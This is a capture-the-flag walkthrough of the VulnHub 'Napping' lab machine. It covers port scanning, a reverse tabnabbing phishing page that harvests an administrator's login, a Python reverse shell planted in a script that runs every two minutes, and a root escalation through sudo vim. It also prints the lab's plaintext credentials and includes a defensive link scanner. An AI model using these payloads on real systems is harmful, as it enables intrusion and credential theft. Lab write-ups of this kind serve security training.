Port scanning

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 21:06 CST
Nmap scan report for 192.168.56.132
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 50.29 seconds
┌──(mikannse㉿kali)-[~/vulnhub]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 21:08 CST
Nmap scan report for 192.168.56.132
Host is up (0.0015s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
| 256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_ 256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Login
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.57 seconds

Tabnabbing

A login page. Testing it for SQL injection and XSS led nowhere. Registering an account through the registration page and logging in gives a form where you can enter a URL, with a note that an administrator will visit it; after clicking submit, the URL is inserted into the HTML:

<p>Thank you for your submission, you have entered: <a href='http://baidu.com' target='_blank' >Here</a></p> 

The link carries target='_blank' and no rel='noopener', which makes a (reverse) tabnabbing attack possible

  • Tabnabbing attack:
    It abuses a browser behaviour: when a link is opened in a new tab, the new page receives a window.opener reference to the original tab and can navigate it (cross-origin it cannot read the original tab, but it can change its location). An attacker can use this to lure a user into clicking a link that opens a seemingly harmless new tab, while that new tab silently redirects the original tab to a page of the attacker's choosing. Adding rel="noopener" to the link severs that reference.

Now start a web server on local port 80 to serve the file

┌──(mikannse㉿kali)-[~/vulnhub/napping]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Then write a phishing page, phish.html, in that directory

<!DOCTYPE html>
<html>
<body>
<script>
if(window.opener) window.opener.parent.location.replace('http://192.168.56.131:8000/');
if(window.opener != window) window.opener.parent.location.replace('http://192.168.56.131:8000/');
</script>
</body>
</html>

When the admin visits phish.html, target='_blank' opens it in a new tab, but the original tab is navigated to the URL passed to location.replace, so the phishing page can be shown without the user noticing
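The defender-side counterpart, as an added example that is not part of the box or this writeup: a small Python scanner that flags anchors with target='_blank' that lack rel='noopener' or 'noreferrer' (the exact markup welcome.php renders), next to a hardened rendering of that message. The sample HTML is constructed to match the page above.

```python
# Added example (not from the original writeup): audit HTML for the reverse
# tabnabbing pattern used on this box and show the hardened link.
from html import escape
from html.parser import HTMLParser


class BlankTargetAuditor(HTMLParser):
    """Collects hrefs of anchors that open a new tab but keep window.opener."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("target", "").lower() != "_blank":
            return
        rel = a.get("rel", "").lower().split()
        # "noreferrer" implies "noopener" in current browsers
        if "noopener" in rel or "noreferrer" in rel:
            return
        self.findings.append(a.get("href", ""))


def unsafe_blank_links(html):
    """Return hrefs of every _blank anchor that still exposes window.opener."""
    parser = BlankTargetAuditor()
    parser.feed(html)
    return parser.findings


def safe_submission_message(url):
    """Hardened form of the welcome.php message: same new-tab UX, but
    rel="noopener noreferrer" so the opened page cannot navigate this tab,
    and the href is attribute-escaped."""
    return ("Thank you for your submission, you have entered: "
            f"<a href=\"{escape(url, quote=True)}\" target=\"_blank\" "
            "rel=\"noopener noreferrer\">Here</a>")


# Constructed sample: the markup the box renders after a submission.
VULNERABLE = ("<p>Thank you for your submission, you have entered: "
              "<a href='http://baidu.com' target='_blank' >Here</a></p>")

if __name__ == "__main__":
    print("unsafe links:", unsafe_blank_links(VULNERABLE))
    print("hardened:", safe_submission_message("http://baidu.com"))
```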

Start nc to listen for the incoming data

┌──(mikannse㉿kali)-[~/vulnhub/napping]
└─$ nc -lvnp 8000
listening on [any] 8000 ...

After a while (if nothing arrives, submit a few more times), the web server receives a request for phish.html

┌──(mikannse㉿kali)-[~/vulnhub/napping]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.132 - - [15/Sep/2024 23:28:03] "GET /phish.html HTTP/1.1" 200 -

And port 8000 receives a message:

┌──(mikannse㉿kali)-[~/vulnhub/napping]
└─$ nc -lvnp 8000
listening on [any] 8000 ...
connect to [192.168.56.131] from (UNKNOWN) [192.168.56.132] 41724
POST / HTTP/1.1
Host: 192.168.56.131:8000
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

username=daniel&password=C%40ughtm3napping123

URL-decode it: daniel:C@ughtm3napping123

These credentials work for SSH login

Lateral movement

config.php

<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'adrian');
define('DB_PASSWORD', 'P@sswr0d456');
define('DB_NAME', 'website');

/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($mysqli === false){
    die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>

Connecting to the database reveals nothing else of interest

adrian's home directory contains a query.py

from datetime import datetime
import requests

now = datetime.now()

r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()

and also a site_status.txt

Site is Up: 14/09/2024 01:54:01
Site is Up: 14/09/2024 01:56:01
Site is Up: 15/09/2024 13:06:01
Site is Up: 15/09/2024 13:08:01
Site is Up: 15/09/2024 13:10:01
Site is Up: 15/09/2024 13:12:02
Site is Up: 15/09/2024 13:14:01
Site is Up: 15/09/2024 13:16:02
Site is Up: 15/09/2024 13:18:01
Site is Up: 15/09/2024 13:20:01

The timestamps show the script is run every two minutes, and the current user daniel has write permission on it; replace its contents with a reverse shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.131",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

Privilege escalation

This user can run vim as root

adrian@napping:/opt$ sudo -l
sudo -l
Matching Defaults entries for adrian on napping:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on napping:
(root) NOPASSWD: /usr/bin/vim

Use vim to spawn a shell; privilege escalation succeeds

adrian@napping:~$ sudo vim -c ':!/bin/sh'
sudo vim -c ':!/bin/sh'

Beyond root

How does this machine simulate the phishing victim?

welcome.php stores the submitted URL in the links table of the database

<?php
<SNIP>
$mysqli = new mysqli("localhost", "adrian", "P@sswr0d456", "website");
// Check connection
if($mysqli === false){
    die("ERROR: Could not connect. " . $mysqli->connect_error);
}

if(isset($_POST['submit'])){ //check if form was submitted
    $input = $mysqli->real_escape_string($_POST['url']);
    $sql = "INSERT INTO links (link) VALUES ('$input')";
    if($mysqli->query($sql) === true){
        $message = "Thank you for your submission, you have entered: <a href='$input' target='_blank' >Here</a>";
    } else{
        $message = "It is totally free!";
    }
}else{
    $message = "It is totally free!"; <SNIP>

napping.py in root's home directory runs on a schedule; it simulates the victim by fetching each stored link and POSTing the credentials to the URL found after 'location.replace' or 'opener.location'

import requests
import re
import mysql.connector

mydb = mysql.connector.connect(
    host="localhost",
    user="adrian",
    password="P@sswr0d456",
    database="website"
)

mycursor = mydb.cursor()

mycursor.execute("SELECT * FROM links")

myresult = mycursor.fetchall()

# credentials the simulated admin "types" into the phishing page
data = {
    "username":"daniel",
    "password":"C@ughtm3napping123"
}

for x in myresult:
    url1 = x[0]

    try:
        # visit the submitted link like the admin would
        r1 = requests.get(url1,timeout=2)
        search = r1.text
        if (search.find('location.replace') != -1):
            # pull the redirect target out of location.replace('http...');
            match = re.findall(r"http(.*)\);",search)
            new_url = 'http' + match[0].rstrip(match[0][-1])
            r2 = requests.post(new_url,data=data,timeout=2)

        elif (search.find('opener.location') != -1):
            # same for opener.location = 'http...';
            match = re.findall(r"http(.*);",search)
            new_url = 'http' + match[0].rstrip(match[0][-1])
            r2 = requests.post(new_url,data=data,timeout=2)

    except requests.exceptions.ReadTimeout:
        continue

Closing notes

I got stuck for a long time because I had never come across tabnabbing; the rest of the box is fairly routine